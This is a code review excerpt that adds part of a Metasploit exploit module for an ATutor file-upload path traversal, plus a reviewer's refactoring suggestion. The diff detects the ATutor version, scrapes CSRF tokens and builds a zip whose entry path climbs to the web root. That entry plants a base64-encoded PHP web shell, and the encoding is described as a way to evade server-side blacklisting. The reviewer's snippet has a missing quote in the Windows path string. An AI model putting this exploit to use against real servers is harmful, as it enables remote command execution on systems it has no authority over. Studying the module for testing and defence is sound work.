modules/exploits/multi/http/atutor_upload_traversal.rb

```diff
@@ -0,0 +1,368 @@
+
+    if target.name == 'Auto'
+      select_target(res)
+    end
+
+    html = res.get_html_document
+    info = html.search('dd')
+    info.each do |dd|
+      if dd.text.to_s.include?('Version')
+        @version = dd.text.split(' ')[0].strip.chomp('.')
+      end
+    end
+
+    unless @version && !@version.to_s.empty?
+      return CheckCode::Detected('Unable to obtain ATutor version. However, the project is no longer maintained, so the target is likely vulnerable.')
+    end
+
+    @version = Gem::Version.new @version
+
+    # in case the developers ever release a patch or a new version
+    unless @version <= Gem::Version.new('2.4')
+      return CheckCode::Unknown("Target is ATutor with version #{@version}.")
+    end
+
+    CheckCode::Appears("Target is ATutor with version #{@version}.")
+  end
+
+  def patcher_csrf_token(upload_url)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => upload_url,
+      'cookie' => @cookie
+    })
+
+    unless res && (res.code == 200 || res.code == 302)
+      fail_with(Failure::NoAccess, 'Failed to obtain csrf token.')
+    end
+
+    html = res.get_html_document
+    csrf_token = html.at('input[@name="csrftoken"]')['value']
+    max_file_size = html.at('input[@name="MAX_FILE_SIZE"]')['value']
+
+    unless csrf_token && csrf_token.to_s.strip != ''
+      csrf_token = @token # these should be the same because if the token generated by the module during authentication is accepted by the app, it becomes the csrf token
+    end
+
+    unless max_file_size && max_file_size.to_s.strip != ''
+      max_file_size = '52428800' # this seems to be the default value
+    end
+
+    return csrf_token, max_file_size
+  end
+
+  def create_zip_and_upload(exploit)
+    @pl_file = Rex::Text.rand_text_alpha_lower(6..10)
+    @pl_file << '.php'
+    register_file_for_cleanup(@pl_file)
+    @header = Rex::Text.rand_text_alpha_upper(4)
+    @pl_command = Rex::Text.rand_text_alpha_lower(6..10)
+    # encoding is necessary to evade blacklisting on server side
+    @pl_encoded = Rex::Text.encode_base64("\r\n\t\r\n<?php echo passthru($_GET['#{@pl_command}']); ?>\r\n")
+
+    # The ATutor documentation recommends Windows users to use a XAMPP server.
+    win_file = "..\\..\\..\\..\\..\\../xampp\\htdocs\\#{@pl_file}"
+    lin_file = "../../../../../../var/www/html/#{@pl_file}"
+
+    # check for custom traversal path
+    if datastore['FILE_TRAVERSAL_PATH'] && datastore['FILE_TRAVERSAL_PATH'].to_s.strip != ''
+      target_platform = 'custom'
+    # check payload to determine which file to add to the zip file
+    elsif target.name == 'Auto'
+      target_platform = datastore['PAYLOAD'].split('/')[0]
+    else
+      target_platform = target.name.downcase
+    end
+
+    file_hash = {
+      'linux' => lin_file,
+      'windows' => win_file,
+      'custom' => "#{datastore['FILE_TRAVERSAL_PATH']}#{@pl_file}"
+    }
```

Comment:
If `@my_target` is valid, the highlighted section could look something like this:

```ruby
if datastore['FILE_TRAVERSAL_PATH']
  @traversal_path = datastore['FILE_TRAVERSAL_PATH']
elsif @my_target['Platform'] == 'linux'
  @traversal_path = "../../../../../../var/www/html/"
else
  @traversal_path = ..\\..\\..\\..\\..\\../xampp\\htdocs\\"
end

@traversal_path = "#{@traversal_path}#{@pl_file}"
```